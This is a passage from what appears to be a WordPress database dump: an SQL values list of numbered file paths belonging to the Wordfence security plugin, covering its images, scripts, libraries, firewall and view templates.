content/plugins/wordfence/images/sort_desc.gif'),(877,'wp-content/plugins/wordfence/images/sort_desc.png'),(878,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(879,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(880,'wp-content/plugins/wordfence/images/support.svg'),(881,'wp-content/plugins/wordfence/images/tools.svg'),(882,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(883,'wp-content/plugins/wordfence/images/wf-error-badge.svg'),(884,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(885,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(886,'wp-content/plugins/wordfence/index.php'),(887,'wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js'),(888,'wp-content/plugins/wordfence/js/admin.1623076348.js'),(889,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js'),(890,'wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js'),(891,'wp-content/plugins/wordfence/js/date.1623076348.js'),(892,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js'),(893,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js'),(894,'wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js'),(895,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js'),(896,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js'),(897,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js'),(898,'wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js'),(899,'wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js'),(900,'wp-content/plugins/wordfence/js/wfdashboard.1623076348.js'),(901,'wp-content/plugins/wordfence/js/wfdropdown.1623076348.js'),(902,'wp-content/plugins/wordfence/js/wfglobal.1623076348.js'),(903,'wp-content/plugins/wordfence/js/wfi18n.1623076348.js'),(904,'wp-content/plugins/wordfence/js/wfpopover.1623076348.js'),(905,'wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js'),(906,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(907,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(908,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(909,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(910,'wp-content/plugins/wordfence/lib/Diff.php'),(911,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(912,'wp-content/plugins/wordfence/lib/IPTraf.php'),(913,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(914,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(915,'wp-content/plugins/wordfence/lib/compat.php'),(916,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(917,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(918,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(919,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(920,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(921,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(922,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(923,'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),(924,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(925,'wp-content/plugins/wordfence/lib/diffResult.php'),(926,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(927,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(928,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(929,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(930,'wp-content/plugins/wordfence/lib/flags.php'),(931,'wp-content/plugins/wordfence/lib/live_activity.php'),(932,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(933,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(934,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(935,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(936,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(937,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(938,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(939,'wp-content/plugins/wordfence/lib/menu_options.php'),(940,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(941,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(942,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(943,'wp-content/plugins/wordfence/lib/menu_support.php'),(944,'wp-content/plugins/wordfence/lib/menu_tools.php'),(945,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(946,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(947,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(948,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(949,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(950,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(951,'wp-content/plugins/wordfence/lib/noc1.key'),(952,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(953,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(954,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(955,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(956,'wp-content/plugins/wordfence/lib/sysinfo.php'),(957,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(958,'wp-content/plugins/wordfence/lib/wf503.php'),(959,'wp-content/plugins/wordfence/lib/wfAPI.php'),(960,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(961,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(962,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(963,'wp-content/plugins/wordfence/lib/wfArray.php'),(964,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(965,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(966,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(967,'wp-content/plugins/wordfence/lib/wfCache.php'),(968,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(969,'wp-content/plugins/wordfence/lib/wfConfig.php'),(970,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(971,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(972,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(973,'wp-content/plugins/wordfence/lib/wfDB.php'),(974,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(975,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(976,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(977,'wp-content/plugins/wordfence/lib/wfDict.php'),(978,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(979,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(980,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(981,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(982,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(983,'wp-content/plugins/wordfence/lib/wfIssues.php'),(984,'wp-content/plugins/wordfence/lib/wfJWT.php'),(985,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(986,'wp-content/plugins/wordfence/lib/wfLog.php'),(987,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(988,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(989,'wp-content/plugins/wordfence/lib/wfNotification.php'),(990,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(991,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(992,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(993,'wp-content/plugins/wordfence/lib/wfScan.php'),(994,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(995,'wp-content/plugins/wordfence/lib/wfSchema.php'),(996,'wp-content/plugins/wordfence/lib/wfStyle.php'),(997,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(998,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(999,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(1000,'wp-content/plugins/wordfence/lib/wfUtils.php'),(1001,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(1002,'wp-content/plugins/wordfence/lib/wfView.php'),(1003,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(1004,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(1005,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(1006,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(1007,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(1008,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(1009,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(1010,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(1011,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(1012,'wp-content/plugins/wordfence/models/common/wfTab.php'),(1013,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(1014,'wp-content/plugins/wordfence/models/page/wfPage.php'),(1015,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(1016,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(1017,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(1018,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(1019,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(1020,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(1021,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(1022,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(1023,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(1024,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(1025,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(1026,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(1027,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(1028,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(1029,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(1030,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(1031,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(1032,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(1033,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(1034,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(1035,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(1036,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(1037,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(1038,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(1039,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(1040,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(1041,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(1042,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(1043,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(1044,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(1045,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(1046,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(1047,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css'),(1048,'wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css'),(1049,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css'),(1050,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css'),(1051,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css'),(1052,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css'),(1053,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css'),(1054,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css'),(1055,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css'),(1056,'wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css'),(1057,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(1058,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(1059,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(1060,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(1061,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(1062,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(1063,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(1064,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(1065,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(1066,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(1067,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(1068,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js'),(1069,'wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js'),(1070,'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js'),(1071,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js'),(1072,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js'),(1073,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js'),(1074,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js'),(1075,'wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js'),(1076,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(1077,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(1078,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(1079,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(1080,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(1081,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(1082,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(1083,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(1084,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(1085,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(1086,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(1087,'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),(1088,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(1089,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(1090,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(1091,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(1092,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(1093,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(1094,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(1095,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(1096,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(1097,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(1098,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(1099,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(1100,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(1101,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(1102,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(1103,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(1104,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(1105,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(1106,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(1107,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(1108,'wp-content/plugins/wordfence/readme.txt'),(1109,'wp-content/plugins/wordfence/vendor/autoload.php'),(1110,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(1111,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(1112,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(1113,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(1114,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(1115,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(1116,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(1117,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(1118,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(1119,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(1120,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(1121,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(1122,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(1123,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(1124,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(1125,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(1126,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(1127,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(1128,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(1129,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(1130,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(1131,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(1132,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(1133,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(1134,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(1135,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(1136,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(1137,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(1138,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(1139,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(1140,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(1141,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(1142,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(1143,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(1144,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(1145,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(1146,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(1147,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(1148,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(1149,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(1150,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(1151,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(1152,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(1153,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),(1154,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),(1155,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),(1156,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),(1157,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),(1158,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),(1159,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),(1160,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),(1161,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),(1162,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),(1163,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),(1164,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),(1165,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),(1166,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),(1167,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),(1168,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),(1169,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),(1170,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),(1171,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),(1172,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),(1173,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),(1174,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(1175,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(1176,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(1177,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(1178,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(1179,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),(1180,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(1181,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(1182,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(1183,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(1184,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(1185,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(1186,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(1187,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(1188,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(1189,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(1190,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(1191,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(1192,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(1193,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(1194,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(1195,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(1196,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(1197,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(1198,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(1199,'wp-content/plugins/wordfence/views/blocking/block-list.php'),(1200,'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(1201,'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(1202,'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(1203,'wp-content/plugins/wordfence/views/blocking/country-modal.php'),(1204,'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(1205,'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(1206,'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(1207,'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(1208,'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(1209,'wp-content/plugins/wordfence/views/common/license.php'),(1210,'wp-content/plugins/wordfence/views/common/modal-prompt.php'),(1211,'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(1212,'wp-content/plugins/wordfence/views/common/page-help.php'),(1213,'wp-content/plugins/wordfence/views/common/page-tabbar.php'),(1214,'wp-content/plugins/wordfence/views/common/page-title.php'),(1215,'wp-content/plugins/wordfence/views/common/section-subtitle.php'),(1216,'wp-content/plugins/wordfence/views/common/section-title.php'),(1217,'wp-content/plugins/wordfence/views/common/status-circular.php'),(1218,'wp-content/plugins/wordfence/views/common/status-critical.php'),(1219,'wp-content/plugins/wordfence/views/common/status-detail.php'),(1220,'wp-content/plugins/wordfence/views/common/status-tooltip.php'),(1221,'wp-content/plugins/wordfence/views/common/status-warning.php'),(1222,'wp-content/plugins/wordfence/views/common/unsubscribe.php'),(1223,'wp-content/plugins/wordfence/views/dashboard/global-status.php'),(1224,'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(1225,'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(1226,'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(1227,'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(1228,'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(1229,'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(1230,'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(1231,'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),(1232,'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(1233,'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(1234,'wp-content/plugins/wordfence/views/diagnostics/text.php'),(1235,'wp-content/plugins/wordfence/views/gdpr/banner.php'),(1236,'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(1237,'wp-content/plugins/wordfence/views/onboarding/banner.php'),(1238,'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(1239,'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(1240,'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(1241,'wp-content/plugins/wordfence/views/onboarding/overlay.php'),(1242,'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(1243,'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),(1244,'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),(1245,'wp-content/plugins/wordfence/views/options/block-controls.php'),(1246,'wp-content/plugins/wordfence/views/options/option-label.php'),(1247,'wp-content/plugins/wordfence/views/options/option-select.php'),(1248,'wp-content/plugins/wordfence/views/options/option-switch.php'),(1249,'wp-content/plugins/wordfence/views/options/option-text.php'),(1250,'wp-content/plugins/wordfence/views/options/option-textarea.php'),(1251,'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),(1252,'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),(1253,'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),(1254,'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),(1255,'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),(1256,'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),(1257,'wp-content/plugins/wordfence/views/options/option-toggled.php'),(1258,'wp-content/plugins/wordfence/views/options/option-token.php'),(1259,'wp-content/plugins/wordfence/views/options/options-title.php'),(1260,'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),(1261,'wp-content/plugins/wordfence/views/reports/activity-report.php'),(1262,'wp-content/plugins/wordfence/views/scanner/issue-base.php'),(1263,'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),(1264,'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),(1265,'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),(1266,'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),(1267,'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),(1268,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),(1269,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),(1270,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),(1271,'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),(1